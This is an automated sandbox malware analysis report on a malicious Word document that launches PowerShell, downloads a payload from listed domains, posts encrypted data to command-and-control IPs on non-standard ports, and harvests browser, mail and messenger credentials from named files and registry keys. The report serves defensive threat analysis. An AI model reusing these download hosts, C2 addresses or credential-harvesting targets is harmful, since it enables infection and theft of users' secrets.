Analysis Report

Overview

General Information

Joe Sandbox Version:	20.0.0
Analysis ID:	33605
Start time:	19:34:12
Joe Sandbox Product:	CloudBasic
Start date:	06.10.2017
Overall analysis duration:	0h 14m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	new order upcoming.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java 8.0.1440.1)
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies	HCA enabled EGA enabled HDC enabled VBA Instrumentation enabled
Detection:	MAL
Classification:	mal100.evad.expl.phis.spyw.troj.winDOC@25/11@1/5
HCA Information:	Successful, ratio: 100% Number of executed functions: 57 Number of non-executed functions: 114
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 51.2% (good quality ratio 46.9%) Quality average: 79.5% Quality standard deviation: 31.6%
Cookbook Comments:	Found application associated with file extension: .doc Found Word or Excel or PowerPoint document Simulate clicks Found new Word/Excel subprocess, stop clicking Number of clicks 18 Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): conhost.exe, dllhost.exe Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryDirectoryFile calls found. Report size getting too big, too many NtQueryValueKey calls found. Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: WINWORD.EXE, powershell.exe

Detection

Strategy	Score	Range	Reporting	Detection
Threshold	100	0 - 100	Report FP / FN

Confidence

Strategy	Score	Range	Further Analysis Required?	Confidence
Threshold	5	0 - 5	false

Classification

Analysis Advice

Sample HTTP request are all non existing, likely the sample is no longer working

Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis

Signature Overview

Click to jump to signature section

AV Detection:

Antivirus detection for domain / URL

Show sources

Source: marley.net

virustotal: Detection: 4%

Perma Link

Antivirus detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\39530.exe	virustotal: Detection: 56%			Perma Link
Source: C:\Users\user\AppData\Local\Temp\39530.exe	metadefender: Detection: 12%			Perma Link

Antivirus detection for submitted file

Show sources

Source: new order upcoming.doc

virustotal: Detection: 52%

Perma Link

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider

Show sources

Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe	Code function: 5_2_003E22D4 GetProcessHeap,RtlAllocateHeap,CryptDuplicateHash,memcpy,CryptEncrypt,CryptExportKey,CryptGetHashParam,CryptDestroyHash,GetProcessHeap,HeapFree,	5_2_003E22D4
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe	Code function: 5_2_003E21E4 memset,CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,	5_2_003E21E4
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe	Code function: 5_2_003E2401 GetProcessHeap,RtlAllocateHeap,CryptDuplicateHash,memcpy,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash,GetProcessHeap,HeapFree,	5_2_003E2401
Source: C:\Windows\System32\wlangdi.exe	Code function: 7_2_002E8642 memset,_snwprintf,CreateMutexW,WaitForSingleObject,_snwprintf,_snwprintf,CreateMutexW,CreateEventW,SignalObjectAndWait,ResetEvent,ReleaseMutex,CloseHandle,GetTickCount,CreateTimerQueueTimer,WaitForSingleObject,DeleteTimerQueueTimer,CloseHandle,CryptDestroyHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,	7_2_002E8642
Source: C:\Windows\System32\wlangdi.exe	Code function: 7_2_002E2401 GetProcessHeap,RtlAllocateHeap,CryptDuplicateHash,memcpy,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash,GetProcessHeap,HeapFree,	7_2_002E2401
Source: C:\Windows\System32\wlangdi.exe	Code function: 7_2_002E21E4 memset,CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,	7_2_002E21E4
Source: C:\Windows\System32\wlangdi.exe	Code function: 7_2_002E22D4 GetProcessHeap,RtlAllocateHeap,CryptDuplicateHash,memcpy,CryptEncrypt,CryptExportKey,CryptGetHashParam,CryptDestroyHash,GetProcessHeap,HeapFree,	7_2_002E22D4
Source: C:\Windows\System32\QYIyP.exe	Code function: 9_2_00A021E4 memset,CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,	9_2_00A021E4
Source: C:\Windows\System32\QYIyP.exe	Code function: 9_2_00A022D4 GetProcessHeap,RtlAllocateHeap,CryptDuplicateHash,memcpy,CryptEncrypt,CryptExportKey,CryptGetHashParam,CryptDestroyHash,GetProcessHeap,HeapFree,	9_2_00A022D4
Source: C:\Windows\System32\QYIyP.exe	Code function: 9_2_00A02401 GetProcessHeap,RtlAllocateHeap,CryptDuplicateHash,memcpy,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash,GetProcessHeap,HeapFree,	9_2_00A02401

Spam, unwanted Advertisements and Ransom Demands:

Contains functionality to import cryptographic keys (often used in ransomware)

Show sources

Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe	Code function: 5_2_003E21E4 memset,CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,	5_2_003E21E4
Source: C:\Windows\System32\wlangdi.exe	Code function: 7_2_002E21E4 memset,CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,	7_2_002E21E4
Source: C:\Windows\System32\QYIyP.exe	Code function: 9_2_00A021E4 memset,CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,	9_2_00A021E4

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)

Show sources

Source: global traffic

DNS query: name: marley.net

Potential document exploit detected (performs HTTP gets)

Show sources

Source: global traffic

TCP traffic: 192.168.2.2:49167 -> 147.135.209.118:443

Potential document exploit detected (unknown TCP traffic)

Show sources

Source: global traffic

TCP traffic: 192.168.2.2:49166 -> 69.195.124.165:80

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking:

Contains functionality to download additional files from the internet

Show sources

Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe

Code function: 5_2_003E1CCB HttpQueryInfoW,GetProcessHeap,RtlAllocateHeap,InternetReadFile,InternetReadFile,GetProcessHeap,HeapFree,

5_2_003E1CCB

Downloads files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word

Downloads files from webservers via HTTP

Show sources

Source: global traffic

HTTP traffic detected: GET /hlJm/ HTTP/1.1Host: marley.netConnection: Keep-Alive

Found strings which match to known social media urls

Show sources

Source: wlangdi.exe	String found in binary or memory: 7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: wlangdi.exe	String found in binary or memory: 7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: wlangdi.exe	String found in binary or memory: Hotmail/MSN equals www.hotmail.com (Hotmail)
Source: wlangdi.exe	String found in binary or memory: lcome.htmlres://C:%5CUsers%5CHERBBL~1%5CAppData%5CLocal%5CTemp%5Cjds796915.tmp%5Cjxpiinstall.exe/progress.htmlhttps://download-installer.cdn.mozilla.net/pub/firefox/releases/54.0.1/win32/en-US/Firefox%20Setup%20Stub%2054.0.1.exehttps://www.microsoft.com/en-us/ie-firstrun/win-7/ie-11/res1.windows.microsoft.com/resources/4.2/wol/shared/images/favicon.icohttps://www.microsoft.com/en-us/ie-firstrun/win-7/ie-11/uihttps://www.mozilla.org/de/firefox/newhttps://www.mozilla.org/en-US/firefox/newhttps://www.mozilla.org/en-US/firefox/new/?scene=2https://www.mozilla.org/en-US/firefox/new/res://C:\Users\user\Downloads\flashplayer26_xa_install.exe/160https://support.microsoft.com/products/internet-explorerhttps://support.microsoft.com/internet-explorerhttps://support.microsoft.com/en-us/products/internet-explorerres://C:\Users\user\Downloads\readerdc_en_xa_crd_install.exe/160https://c1.microsoft.com/c.gif?DI=4050&did=1&t=https://c1.microsoft.com/c.gifhttps://adobe-d.openx.net/w/1.0/afr?auid=463664&cb=INS
Source: wlangdi.exe	String found in binary or memory: lcome.htmlres://C:%5CUsers%5CHERBBL~1%5CAppData%5CLocal%5CTemp%5Cjds796915.tmp%5Cjxpiinstall.exe/progress.htmlhttps://download-installer.cdn.mozilla.net/pub/firefox/releases/54.0.1/win32/en-US/Firefox%20Setup%20Stub%2054.0.1.exehttps://www.microsoft.com/en-us/ie-firstrun/win-7/ie-11/res1.windows.microsoft.com/resources/4.2/wol/shared/images/favicon.icohttps://www.microsoft.com/en-us/ie-firstrun/win-7/ie-11/uihttps://www.mozilla.org/de/firefox/newhttps://www.mozilla.org/en-US/firefox/newhttps://www.mozilla.org/en-US/firefox/new/?scene=2https://www.mozilla.org/en-US/firefox/new/res://C:\Users\user\Downloads\flashplayer26_xa_install.exe/160https://support.microsoft.com/products/internet-explorerhttps://support.microsoft.com/internet-explorerhttps://support.microsoft.com/en-us/products/internet-explorerres://C:\Users\user\Downloads\readerdc_en_xa_crd_install.exe/160https://c1.microsoft.com/c.gif?DI=4050&did=1&t=https://c1.microsoft.com/c.gifhttps://adobe-d.openx.net/w/1.0/afr?auid=463664&cb=INS

Performs DNS lookups

Show sources

Source: unknown

DNS traffic detected: queries for: marley.net

Posts data to webserver

Show sources

Source: unknown

HTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 147.135.209.118:443Content-Length: 324Connection: Keep-AliveCache-Control: no-cacheData Raw: 4b 5c d4 e8 db 68 10 c4 10 2a 66 d3 23 07 2f aa 28 11 b7 82 49 9c ff 44 c1 71 db 1e 70 f6 1a 92 54 a1 7c cf dc 9d 9d 40 b9 71 a4 fc 1b 04 f7 2f da 3b 7d f9 1b 63 91 f2 c1 f5 02 9c 8f 4c cc 15 c3 ce 1f 2f 3c de 56 15 b0 c1 2d 6f 7e 0a 98 0d f1 e3 c2 86 4b be ac 96 01 df fe 50 58 a0 a2 e5 64 a0 55 0d 95 25 d1 e1 48 be 9f cf 87 5a 23 5b 1e 0e cd 5a 02 a1 22 2f b4 7c c9 c9 84 31 2d 39 35 fa 91 69 fa cf f7 01 57 92 6f 89 d0 3c 82 8f 40 1b 1b f1 60 68 a8 28 25 c7 5c 00 82 15 ed 95 9b a0 35 cc 1a 1c 08 9b b3 fd 34 50 6f 5c 9b 10 b4 9f df 70 61 b3 28 43 2c 32 4e f6 a7 75 8e 00 51 39 20 de 28 af 5e 60 98 3b 92 1f 59 2f e3 d3 0c 9b 25 59 80 2c fe 02 23 99 88 3a db 81 8f 11 39 b7 b7 69 35 13 b7 2f bc 8a e4 3d 41 f0 6f

Tries to download non-existing http data (HTTP/1.1 404 Not Found)

Show sources

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 06 Oct 2017 17:35:11 GMTContent-Type: text/html; charset=UTF-8Content-Length: 61908Connection: keep-aliveData Raw: 8d a8 74 9d 75 38 54 2f b9 38 11 6b 09 5f 95 9c 64 c7 26 c2 43 ec 01 82 b2 86 24 0d 22 47 1f 3b c6 a2 b3 08 7d 09 f2 93 fb 4c f6 94 9c 41 fb 55 68 36 f5 71 e7 da d6 af 88 71 31 b6 25 5c 62 d0 a4 88 ab 97 ea 56 69 f0 42 39 e4 61 4f 0f 0a f3 44 f4 9b 76 53 a9 04 cc 09 88 99 d8 c4 53 12 a3 87 a5 78 b0 c4 09 d0 07 99 30 80 84 50 cd a5 ba 02 41 e0 3d f6 76 07 4f 37 50 21 ba 56 ee e8 c3 9c 3c be c1 a4 ed 74 c7 87 33 0f f4 2a 34 ac 28 89 c4 a4 66 4c 3a 25 e4 71 4d f1 7e 72 52 40 8b 46 b4 f3 a6 54 1d 34 d9 52 f0 cb e3 a5 ab d3 86 9a 95 10 24 6b a5 b7 e4 82 fe 9a e7 f2 72 1f 96 c4 b7 07 3d 5c 0a 51 2e d6 df 1c 72 31 5f 00 a9 56 76 05 91 43 f8 ce 59 17 48 48 74 c2 d2 83 2e 5b 07 d3 f6 a0 b0 2f 67 a9 b8 4e d3 a8 96 c8 bf 83 e2 f6 0f 9a f3 bc 6f 42 0d d6 84 68 0a 65 63 42 94 da b0 9c 95 4d 9a 92 38 48 bb b0 d8 8e 1a 6b 3d a8 14 e3 29 e1 c4 26 16 80 cc

Urls found in memory or binary data

Show sources

Source: powershell.exe	String found in binary or memory: file://
Source: WINWORD.EXE, powershell.exe	String found in binary or memory: file:///
Source: WINWORD.EXE	String found in binary or memory: file:///c:
Source: WINWORD.EXE	String found in binary or memory: file:///c:/users/herb%20blackburn/desktop/new%20order%20upcoming.doc
Source: powershell.exe	String found in binary or memory: file:///c:/windows/system32/windowspowershell/v1.0/n
Source: powershell.exe	String found in binary or memory: file:///c:/windows/system32/windowspowershell/v1.0/x
Source: powershell.exe	String found in binary or memory: http://
Source: powershell.exe	String found in binary or memory: http://austx
Source: powershell.exe	String found in binary or memory: http://austxport.com.au/redbeandesign/zaw/
Source: wlangdi.exe	String found in binary or memory: http://crl4.digicert.com/digicerthighassuranceevrootca.crl0=
Source: powershell.exe	String found in binary or memory: http://ctmket.com/fwdbho/
Source: powershell.exe	String found in binary or memory: http://d
Source: powershell.exe	String found in binary or memory: http://deinc.com/uqpkzqxqq/
Source: wlangdi.exe	String found in binary or memory: http://https://:stringdatawininetcachecredentialsftp://dpapi:captionmenu_%ddialog_%dstringsgeneralsy
Source: powershell.exe	String found in binary or memory: http://marley.ne
Source: powershell.exe	String found in binary or memory: http://marley.net
Source: powershell.exe	String found in binary or memory: http://marley.net/hljm/
Source: powershell.exe	String found in binary or memory: http://marley.netx&zk8
Source: powershell.exe	String found in binary or memory: http://marley.nex
Source: wlangdi.exe	String found in binary or memory: http://ocsp.digicert.com0k
Source: powershell.exe	String found in binary or memory: http://q-productions.com/jkxhsksgj/
Source: powershell.exe	String found in binary or memory: http://q-productions.com/jkxhsksgj/t
Source: powershell.exe	String found in binary or memory: http://schemas.dmtf.org/wbem/wsman/1/cimbinding/associationfilter
Source: powershell.exe	String found in binary or memory: http://schemas.dmtf.org/wbem/wsman/1/wsman/selectorfilter
Source: powershell.exe	String found in binary or memory: http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd#identifyresponse
Source: wlangdi.exe	String found in binary or memory: http://t1.symcb.com/thawtepca.crl0/
Source: wlangdi.exe	String found in binary or memory: http://t2.symcb.com0a
Source: wlangdi.exe	String found in binary or memory: http://www.nirsoft.net/
Source: wlangdi.exe	String found in binary or memory: https://download-installer.cdn.mozilla.net/pub/firefox/releases/54.0.1/win32/en-us/firefox%20setup%2
Source: wlangdi.exe	String found in binary or memory: https://www.digicert.com/cps0
Source: wlangdi.exe	String found in binary or memory: https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/l
Source: wlangdi.exe	String found in binary or memory: https://www.thawte.com/cps0)

Uses HTTPS

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167

HTTP GET or POST without a user agent

Show sources

Source: global traffic

HTTP traffic detected: GET /hlJm/ HTTP/1.1Host: marley.netConnection: Keep-Alive

Uses a known web browser user agent for HTTP communication

Show sources

Source: global traffic	HTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 147.135.209.118:443Content-Length: 324Connection: Keep-AliveCache-Control: no-cacheData Raw: 4b 5c d4 e8 db 68 10 c4 10 2a 66 d3 23 07 2f aa 28 11 b7 82 49 9c ff 44 c1 71 db 1e 70 f6 1a 92 54 a1 7c cf dc 9d 9d 40 b9 71 a4 fc 1b 04 f7 2f da 3b 7d f9 1b 63 91 f2 c1 f5 02 9c 8f 4c cc 15 c3 ce 1f 2f 3c de 56 15 b0 c1 2d 6f 7e 0a 98 0d f1 e3 c2 86 4b be ac 96 01 df fe 50 58 a0 a2 e5 64 a0 55 0d 95 25 d1 e1 48 be 9f cf 87 5a 23 5b 1e 0e cd 5a 02 a1 22 2f b4 7c c9 c9 84 31 2d 39 35 fa 91 69 fa cf f7 01 57 92 6f 89 d0 3c 82 8f 40 1b 1b f1 60 68 a8 28 25 c7 5c 00 82 15 ed 95 9b a0 35 cc 1a 1c 08 9b b3 fd 34 50 6f 5c 9b 10 b4 9f df 70 61 b3 28 43 2c 32 4e f6 a7 75 8e 00 51 39 20 de 28 af 5e 60 98 3b 92 1f 59 2f e3 d3 0c 9b 25 59 80 2c fe 02 23 99 88 3a db 81 8f 11 39 b7 b7 69 35 13 b7 2f bc 8a e4 3d 41 f0 6f
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.1.78.129:8080Content-Length: 340Connection: Keep-AliveCache-Control: no-cacheData Raw: 3a e7 ac 7e ed 87 d1 9d 6f 63 5d 13 87 bf 22 64 d1 2f ff a4 ec 47 68 c7 d4 8d 5a 39 b5 68 91 9b 20 9c 9f bd 61 1f a8 f9 bb 30 c3 9a 5c 20 33 cf a9 17 9a a5 b0 56 d7 88 5d dc 41 0b e3 1f b6 b0 aa 89 55 c6 6e 2a 8a 22 f5 bb 50 fe 99 50 73 cd 35 ea 3b 0e f7 3d ec fe fe 7a 18 4a 72 76 5c f2 e9 a2 f6 e2 7a c6 ad 21 55 b7 02 8b d4 c1 e5 52 93 f3 65 ac f9 c3 c4 dd 93 8e 86 4a a2 04 5a 91 fa 26 65 0d db b3 cd 00 d3 a7 50 a6 ab a2 3d 11 09 51 6f be fe ad 3e 6f 98 8f c0 c6 19 f5 01 a7 56 cb ca a7 11 6d f2 ab b4 19 b5 7c a6 c9 23 d5 c8 fc 15 d0 c0 b7 53 c2 8d ea 09 bc e3 8a bf 83 15 1c 60 17 53 5b 66 eb d2 35 bb 15 34 97 d2 d7 f3 f1 bf 07 5d 7c 64 08 08 03 d9 a5 7f c9 8c 97 b8 09 c2 dc 1f 77 75 04 7b d8 4b a7 55 ee 39 7
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 46.4.67.203:7080Content-Length: 324Connection: Keep-AliveCache-Control: no-cacheData Raw: 0c 87 9c c6 b9 4b f8 dd a9 dc 11 00 7b d8 ef cf 5a 68 b6 73 d9 97 ce 85 29 fa c4 95 09 0e 25 02 ef 7a 0a 49 cb fa a9 76 34 20 9b cf 9f c2 07 fd 77 53 fc 17 7c 07 7d dd ee 18 d2 0e e4 cc 63 27 63 0b 33 a4 2c 0a 1b 6d 6e 62 ba 35 44 95 e9 3e d5 8d ff fb 05 ed 6d c4 c2 6e 5c 1c ff 9a 0d c9 79 c0 fe 55 b8 38 e3 fe 8a 30 8e f2 2f f6 81 51 a2 5e fb 06 b6 fd 97 78 d0 7e 10 1f 03 fb 47 f4 b2 d1 7a ab a5 9f da 5d 6a da 84 19 d8 ab 2e a0 e8 86 ac 02 78 0d 45 38 c4 b5 d3 bb 23 79 1f 3c 59 1a 93 fc b7 4c 00 70 42 d8 b4 e1 82 b4 02 e5 5e 79 dc 39 5a 4e 68 ff 86 45 42 1d b2 75 1d 03 13 a2 ba c3 f7 48 c6 82 90 4c dd 20 ec 86 d8 11 96 09 b2 77 27 98 a8 8d 79 b7 8f d0 fb 21 75 d1 d0 87 b1 10 bc ae ac 61 48 4d 14 eb d9 7e d5 af
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 46.4.67.203:7080Content-Length: 340Connection: Keep-AliveCache-Control: no-cacheData Raw: a8 ad cb 27 5e 7b bd eb b1 69 0e 70 94 3c 40 cb 94 fc 1a 02 3e 89 e3 43 57 48 08 9a 50 27 80 75 f8 0b 60 bb b7 15 7f 98 b8 b2 e3 14 9a 19 de d4 8d 68 43 25 29 63 f6 a2 6b 64 48 39 8b 42 83 34 a7 92 a3 63 d1 6f 39 f0 15 3a 6e 07 e6 ef 5a c4 97 31 83 88 7b d5 36 f6 40 dc 0c 82 42 ff a9 f5 b1 94 a4 9c e1 1e 3b 37 2a 5c b2 41 e9 40 05 91 20 db 5c 47 05 b5 f4 f4 b1 7b f2 99 d3 63 df 40 bd 5b cb a3 f8 b7 7f 65 11 c3 47 44 02 05 4f 32 c2 43 1d 41 1e ca 2d a6 69 4a b6 2d 38 c8 27 25 fd dd a3 86 f7 45 a8 e8 95 da 74 b6 7c 60 e7 eb 39 3c e5 38 66 c6 d1 fc 5b c5 9f 4b af d1 e1 4d ad 44 a6 52 5c d2 a9 0f 7d b0 ed 7b 7d 18 54 3d 71 b8 c6 9c 20 5d 8e 87 bc 3a 76 80 14 12 35 7a ba c2 3d f8 27 42 e5 3d c6 95 10 85 c0 a3 29 c1

Detected TCP or UDP traffic on non-standard ports

Show sources

Source: global traffic	TCP traffic: 192.168.2.2:49168 -> 198.1.78.129:8080
Source: global traffic	TCP traffic: 192.168.2.2:49169 -> 46.4.67.203:7080

Uses known network protocols on non-standard ports

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 49169 -> 7080
Source: unknown	Network traffic detected: HTTP traffic on port 7080 -> 49169
Source: unknown	Network traffic detected: HTTP traffic on port 49169 -> 7080
Source: unknown	Network traffic detected: HTTP traffic on port 7080 -> 49169

Boot Survival:

Contains functionality to start windows services

Show sources

Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe

Code function: 5_2_003E8ABC lstrcmpiW,memset,memset,SHFileOperationW,GetTempPathW,GetTempFileNameW,SHFileOperationW,SHFileOperationW,OpenSCManagerW,CreateServiceW,OpenServiceW,EnumServicesStatusExW,GetLastError,GetProcessHeap,RtlAllocateHeap,EnumServicesStatusExW,OpenServiceW,QueryServiceConfig2W,GetLastError,GetProcessHeap,RtlAllocateHeap,QueryServiceConfig2W,GetProcessHeap,HeapFree,CloseServiceHandle,GetProcessHeap,HeapFree,ChangeServiceConfig2W,GetProcessHeap,HeapFree,StartServiceW,CloseServiceHandle,CloseServiceHandle,memset,CreateProcessW,CloseHandle,CloseHandle,

5_2_003E8ABC

Stealing of Sensitive Information:

Searches for Windows Mail specific files

Show sources

Source: C:\Windows\System32\wlangdi.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
Source: C:\Windows\System32\wlangdi.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail unknown
Source: C:\Windows\System32\wlangdi.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
Source: C:\Windows\System32\wlangdi.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
Source: C:\Windows\System32\wlangdi.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup unknown
Source: C:\Windows\System32\wlangdi.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
Source: C:\Windows\System32\wlangdi.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new unknown
Source: C:\Windows\System32\wlangdi.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery *
Source: C:\Windows\System32\wlangdi.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery unknown

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Windows\System32\wlangdi.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\System32\wlangdi.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\cert8.db
Source: C:\Windows\System32\wlangdi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\System32\wlangdi.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\4ah7hlda.default\cert7.db
Source: C:\Windows\System32\wlangdi.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\secmod.db
Source: C:\Windows\System32\wlangdi.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\key3.db
Source: C:\Windows\System32\wlangdi.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\4ah7hlda.default\cert8.db
Source: C:\Windows\System32\wlangdi.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\4ah7hlda.default\secmod.db
Source: C:\Windows\System32\wlangdi.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\places.sqlite

Tries to steal Instant Messenger accounts or passwords

Show sources

Source: C:\Windows\System32\wlangdi.exe

Key opened: HKEY_USERS\Software\Google\Google Talk\Accounts

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Windows\System32\wlangdi.exe	Key opened: HKEY_USERS\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\System32\wlangdi.exe	Key opened: HKEY_USERS\Identities\{C989D9FB-AC77-4182-809E-7F5679D38F00}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\System32\wlangdi.exe	Key opened: HKEY_USERS\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\System32\wlangdi.exe	Key opened: HKEY_USERS\Software\IncrediMail\Identities
Source: C:\Windows\System32\wlangdi.exe	Key opened: HKEY_LOCAL_MACHINE\Software\IncrediMail\Identities
Source: C:\Windows\System32\wlangdi.exe	Key opened: HKEY_USERS\Software\Microsoft\Windows Live Mail
Source: C:\Windows\System32\wlangdi.exe	Key opened: HKEY_USERS\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\NULL
Source: C:\Windows\System32\wlangdi.exe	Key opened: HKEY_USERS\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\NULL
Source: C:\Windows\System32\wlangdi.exe	Key opened: HKEY_USERS\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\System32\wlangdi.exe	Key opened: HKEY_USERS\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\System32\wlangdi.exe	Key opened: HKEY_USERS\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles

Persistence and Installation Behavior:

Drops PE files

Show sources

Source: C:\Windows\System32\wlangdi.exe	File created: C:\Windows\System32\QYIyP.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\39530.exe

Drops PE files to the windows directory (C:\Windows)

Show sources

Source: C:\Windows\System32\wlangdi.exe

File created: C:\Windows\System32\QYIyP.exe

May use bcdedit to modify the Windows boot settings

Show sources

Source: wlangdi.exe

